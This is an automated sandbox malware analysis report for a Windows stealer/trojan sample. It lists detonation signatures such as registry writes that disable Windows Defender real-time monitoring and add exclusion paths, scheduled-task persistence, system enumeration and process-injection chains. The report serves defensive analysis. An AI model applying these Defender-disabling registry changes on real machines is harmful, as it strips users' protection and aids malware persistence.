Malware Analysis Report

2024-11-15 06:11

Sample ID 240407-3qvkdaaa9v
Target 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
SHA256 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
Tags
evasion spyware stealer trojan discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1

Threat Level: Known bad

The file 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1 was found to be: Known bad.

Malicious Activity Summary

evasion spyware stealer trojan discovery

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Blocklisted process makes network request

Loads dropped DLL

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Checks installed software on the system

Drops desktop.ini file(s)

Drops Chrome extension

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 23:43

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 23:43

Reported

2024-04-07 23:46

Platform

win7-20240221-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A

Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\wscript.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\wscript.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000f0b31eba4589da01 | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df6aba4589da01 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\SysWOW64\wscript.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\wscript.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\wscript.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\SysWOW64\wscript.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\SysWOW64\wscript.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 | N/A | C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\forfiles.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\forfiles.exe | C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1608 wrote to memory of 1544 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1608 wrote to memory of 1544 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1608 wrote to memory of 1544 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1608 wrote to memory of 1544 | N/A | C:\Windows\system32\taskeng.exe | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1544 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe | C:\Windows\SysWOW64\schtasks.exe
